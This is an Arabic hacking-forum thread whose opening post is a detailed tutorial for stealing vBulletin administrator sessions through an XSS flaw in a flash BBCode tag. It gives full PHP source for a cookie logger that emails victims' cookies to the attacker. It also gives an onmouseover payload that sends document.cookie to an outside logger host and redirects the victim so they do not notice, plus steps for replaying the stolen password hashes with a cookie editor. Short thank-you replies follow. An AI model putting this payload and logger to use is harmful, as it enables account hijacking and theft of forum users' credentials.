مشاركتك هنا تمثل للجميع أخلاقك وثقافتك تذكر هذا جيدا قبل نشرها في موضوع جديد

zmani · #1 (**permalink**) 06-13-2005, 12:28 PM

:::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل:::::

بمنااااسبة انتهااااااء الاختبااااراااااات وبدأ الاجااااازة الصيفية حبيت اقدم لكم شرح مفصل لاحدى ثغرات xss

الا وهي ثغرة الصندوق السحري والمااااااسي

:::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري الماسي بالتفصيل الممل:::::

طبعااااا اخونا العندليب اكتشف ثغرة في الصندوقين السحري والماسي\ ثغرة الفلاش \ ثغرة الريلر بلير\ ثغرة تنسيق القصيدة\

الان بشرح لكم ثغرة الفلاش لكثرة استخدامهاااا المنتشر في المنتدياااااااات والمنتديات المصاابة بهااااا كثير للغاية بنسة 95%

وقليل اللي مرقعهاااااااا

لانهم بيقولون استغلالها صعب بس مافية شيء صعب مع الحيل والافكاااااااااااااااار ؟

طبعاااااااا الثغرة جربتها على 3 منتديات احدى المنتديات قدرت ادخل بنك الادمن وو7 مشرفين خلال ساعة ؟ طيب مايهمنا ؟

الحين بشرح لكم كل شيء باختصاااااااااااار ركزوااااااااااااا؟

اقرأ العبااااااااااااااااااارة التااااااااااااالية
اقسم بالله ااااانني لااستخدمهااااااااااااااا ضد اخواني المسلمين
انا طبقت الثغرة على منتديات كثيره ورحت للأدمن اعطيته موضوع لي وفية فلاش حلووو على كيفك دخل الصفحة ومرر الماوس

فقط وعلى طول جاني الكوكيز حقة مثل البرق خلال اقل من دقيقة دخلت بنكة

الادوات التي بنستخدم:
لوجو وجبت لكم لوجو جديد من برمجة الأخ ديفيل
ملاحظة جدااا مهمة بالنسبة لاي سطر توجد فية نجوم زي كذا ****** عددها 6 فاعرف انها كلمة

c o o k i e انت امسح النجوم وحط مكانها نفس الكلمة لان الكلمة مشفره بالمنتدى وبالتالي يطلع لنا نجووم

كود PHP:

  <?php

/* S4aLog v1.0 [ Beta ]

-----------------------

**Beta Of S4aLog v1.0 With Str_Repalce <;>

! You Can Get ******s And Refresh The Broweser ! v0.10

[ New New New ]

!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=******s 

[ MSG ]

Name : Attack1

******s : ******s

Refresh : http://www.s4a.xx

[ MSG ]!

!

Get ******s Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;

!

[ New New New ]

*/

$YourMail = "ta_raq@hotmail.com";  // Your E-mail

/*-----------------------*/

$Ip = $REMOTE_ADDR;

$Cooki_e = $_GET['id'];

$NameOfAttack = $_GET['nm'];

$Refresh = $_GET['re'];

/* Start */

$Replace******1 = array("=",";");

$Replace******2 = array("[ "," ]  ");

$Cooki_e = str_replace($Replace******1,$Replace******2,$Cooki  _e); // Replace

/* e.x hash=0210; | hash[0210]*/

//***************************************//

$Hdr = "From: S4aLog <log-v1@s4a.cc>";

$Msg =

"

Mr Attacker ;) ,,, S4aLog v1 Beta <<

[ ".$NameOfAttack." ] ,, Name Of Attack

[ ".$Refresh." ] ,, Refresh Page

[ ".$Ip." ] ,, Ip

[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]

[ devil-00@hotmail.co.uk - devil.00@gmail.com ]

-----------------------------------------------

****** ::

".$Cooki_e."

";

/* ------------------------------------------------------------------------- */

$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);

/**************************************************      ***************************/

if($Send){

if($Refresh <> ""){header("location:".$Refresh);}

}

?>

طيب الحين ارفع الوجو على النت بس هنااااك ملاحظة::::: قبل لاترفعة على النت غير الايميل اللي بداخل اللوجو الى ايملك هنااااا

YourMail = "ta_raq@hotmail.com"; // Your E-mail
طبعا هذا بداخل اللوجو غيرة الى ايميلك واللي يحتاااج الى تغير هو::ta_raq@hotmail.com)::: هذا فقط ولما تغير الايميل سوي لة حفظ

وارفع الوجو على النت الان خلاص الوجو وانتهيناااا منه؟

الحين نجي للمهم وهو كود الثغرة وراح نطبق احدى ثغرات الصندوق والتجربة راح تكون لثغرة الفلاش؟

كود ثغرة الفلاش هووو::::

كود PHP:

  [flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(########################.##################);'[/flash]

كيفية ربط ثغرة الفلاش بالوجو وهو الاهم؟؟

انا بشرح لكم بالتفصيل على الرابط التالي عشان الكل يفهم بسرعة \

كود PHP:

  [flash=http://www.arab4nokia.net/up/upload/asaa.swf]onmouseover='location.href="http://www.jms-herbs.com/log.php?nm=al-battar.net&re=http://bdr130.net/vb/newthread.php?do=newthread&f=40&id="+########################.##################'[/flash]

الاشياء اللي تحتااااااج الى تغيرررر على النحووو التالي \

طيب الان نمسك الكود خطوة خطوة><><><
1__ http://www.arab4nokia.net/up/upload/asaa.swf هذا يااخواني رابط الفلاش اللي تبي يطلع في الصفحة مثلا لو حطيت الفلاش
في توقيعك انت على كيفك تحط الفلاش على اناشيد اسلامية او فلاش مرعب او فلاش العاب او الخخخخ على كيفك خذ لك اقرب فلاش

بالنت بس نصيحتي لك يكون حجمة قليل مو كثير عشان مايعلق بالصفحة \
2_http://www.jms-herbs.com/log.php هذا رابط اللوجوو اللي قلت لكم ارفعوة للنت غير الى الموقع اللي رفعته عليه الظاااهر مايحتاااج توضيح اكثر \
3_http://bdr130.net/vb/newthread.php?do=newthread&f=40هذا مهم ياشباب مثلا اللي انت ناوي علية لما يمرر الماوس على الفلاش اكيد بتتغير الصفحة وبينتقل الى صفحة اخررررى انت خليك مثلي انا خليته يرجع للصفحة نفسهاااااا عشان مايشك الضحية وتقدر تغيرها لاي رابط تبي وانا حطيتها على نفس الوضوع الي كتبته يعني لك الحريه لاكن الافضل انك توهم الضحيه ومايشك
طبعا الاخ ديفيل جزاه الله خير طور الوجو ؟؟ الوجو الاول كان لما بيمرر الضحية الماوس بينقلة الى صفحة بيضاء وهنااا بيشك الضحية بيقول وش جاب الصفحة البيضاء الحين لكن اخوي ديفل طور الوجو الثاني وترك لك الاختيار على كيفك حط اي صفحة تريد تحويل الضحية

لها عشان مايشك ابدااااااا
طيب ممكن يسال احدكم وبيقول اناحااااط الوجو في كم منتدى ولا اعرف معلومااااات الكوكيز اللي بتصل للايميل لاي منتدى ؟؟؟

الاجاااااابة : الخطوة رقم 3_http://bdr130.net/vb/newthread.php?do=newthread&f=40 اللي توهم فيها الضحية راح تجيك داخل الرسالة

اللي بتجيك على ايميلك وبكذا تعرف الكوكيز لاي منتدى ؟؟؟؟؟
طبعااااااااااا الكوكيز بيوصل لك على الايميل بالشكل التالي اللي بنحتاجة بس هووووووو::
****** ::
bblastvisit[ 1118533206 ] bblastactivity[ deleted ] bbuserid[ 4 ] bbpassword[
70c57b1de64b4bf4a10ed46886d77d10 ] bbsessionhash[
618175907d547968ee1e82b796c288ac ] bbforum_view[
ax3x-ix3yix1118527344yix35yix1118527616yix38yix11185278 05y_ ]
bbthread_lastview[ ax1x-ix1245ysx10x\"1117254496\"y_
طبعاااااااااااا لازم تكون مسجل في المنتدى اللي ناوي علية عشان تغير معلوماتك بمعلومات الضحية

bbpassword
bbuserid
bblastactivity
bblastvisit
يعني بالعربي على حسب المعلومات الي تجيك على الوجو سويها مثلها
ملاحظة قفل كل صفحااااااااااااات الاكس بلور او فاير فوكس او اي متصفح اللي تستخدمة
الان افتح برناااااامج كوكيز ايدتور Editc o o k i eالظاااااااااااااهر البرناااااامج موجود عند الكل لانه استخدم في ثغرات من قبل؟

افتح برنااااامج Editc o o k i eوعلى طول اكتب اسم الموقع بجنب كلمة look for

والموقع اللي بنجرب علية منتدى مدرسة المشاغبين اكتب اسم الموقع bdr130.netبعدين go

الحين طلع لك زي كذا

bbpassword
bbuserid
bblastactivity
bblastvisit
ملالاحظة
bb الكل ملاحظهاااا مو كل المنتديات بيجي مثلها اقصد حرف bb اللي تبدأ فية كل كلمة لا عادي يمكن تلقى منتدى يبدأ بــ rr عااادي جداا

على حسب اللي موجود في ملف الكوفينج ؟
طيب الان غير معلوماتك بمعلوماااااااااات الضحية التي وصلت لك على الوجو كما في الصورة

وبعدين روح الان افتح المتصفح وعلى طول طير للمنتدى الضحية راح تلقى نفسك ادمن مكتوب او العضو الي بتدخل في نكه؟
اهلا بكم يـــــا ............... نفس ماسويت على بعض المنتديات::::
وتمت التجربة4 منتديات والحمد لله تم الدخول ادمن
شباب الثغرة شغال في اغلب المنتديات واستغلالها سهل للغاية انتوا شفتوا الشرح طويل انا تعمدت اطولة عشان الكل يفهم ولا هو المفروض في 8 سطور تكفية
سوف ارفق ملف الوجو وكود ربط الفلاش بالوجو ورابط برنامج تحرير الكوكيز بالمرفقات وذالك بسبب النجوم الظاهره باكواد الثغره
لان كلمة كوكيز مشفره
كلمة اخيرااااااااااا اوجهها لكم : ارجو منكم عدم استخدااااااااام الثغرة في المنتديااااااات العربية
اللهم اني بغلت اللهم فاااااشهد؟
قبل لاننهي موضوعنااااااا للذين يردون ترقيع الثغرة عندي طريقة حلووووووة

وخفيفة على الكل ولا تحتاااج لخبرة وهذي الطريقه اخذتها من اخوي البدر(ابو عمر)جزاه الله خير
قالي لا تعدل ملفات ولا شي ولا وجع راس
كلمة c o o k ie اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة ؟ كما تلاحظون كلمة c o o ki e جلعت بين الحروف مسااافة لاني لو كتبتها عااادية
سوف تطلع على شكل نجوم
في طريقة ثانية للترقيع الا وهي طريقة العندليب ملف تستبدلة كاااااامل انت مخير في اي طريقة تريد

بالنسة لملف العندليب الي يبيها بجيبها له وعلى ما اعتقد انها موجوده بالمنتدى
واذا ماحصلناها نجيبها*_^
################################################## ##
################################################## ####
#########وفي الاخير تقبلوا تحياااااااااااااااااااااااااااااتي اخوكم zmani########
########ارجو من الذين ينقلون الشرح ان يحفضوا الحقوق لصااااااحبهااااااااا###########
################################################## #########
################################################## ###########
##########في امان الله لنااااااااااا لقااااااااااااء في دروس قااااااااااااادمة###################
################################################## ################

منتديات مدرسة المشاغبين - الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus

ابو عمر · #2 (**permalink**) 06-13-2005, 12:31 PM

مشكوووووور اخوي

alk@sser · #3 (**permalink**) 07-10-2005, 01:52 AM

ياسلام عليك

مشكور اخوي عل هذا الشرح الوافي

مجهود ولا اروع

في انتظار المزيد من ابداعاتك

تحياتي

شاعرة الغرام · #4 (**permalink**) 07-10-2005, 04:31 AM

يسلمووووو اخووووووووي
في انتظار كل جديدك

NzF · #5 (**permalink**) 03-15-2006, 01:00 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة zmani

################################################## ##
################################################## ####
#########وفي الاخير تقبلوا تحياااااااااااااااااااااااااااااتي اخوكم zmani########
########ارجو من الذين ينقلون الشرح ان يحفضوا الحقوق لصااااااحبهااااااااا###########
################################################## #########
################################################## ###########
##########في امان الله لنااااااااااا لقااااااااااااء في دروس قااااااااااااادمة###################
################################################## ################

يعطيك العافيه بس ياليت اخوي تحفظ الحقوق حق صاحبها كريمنال نت

صاحب الموضوع الاصلي ...

استضافة مواقع	معنى كلمة	رسائل مسجات	دردشة شات	افلام × فيلم
فلاش اسلامي	الثقافة الجنسية في عالم الجنس	صور جديدة		توبيكات × توبيك
ابتسامات خلفيات	العاب جديدة	دليل مواقع	-	مركز تحميل ملفات
بطاقات كروت	جوال موبايل	جافا java	قصص روايات	-
كتب الكترونية	ماسنجر في مسنجر	-	-	العاب بنات للبنات فقط 2010

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طريقة عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري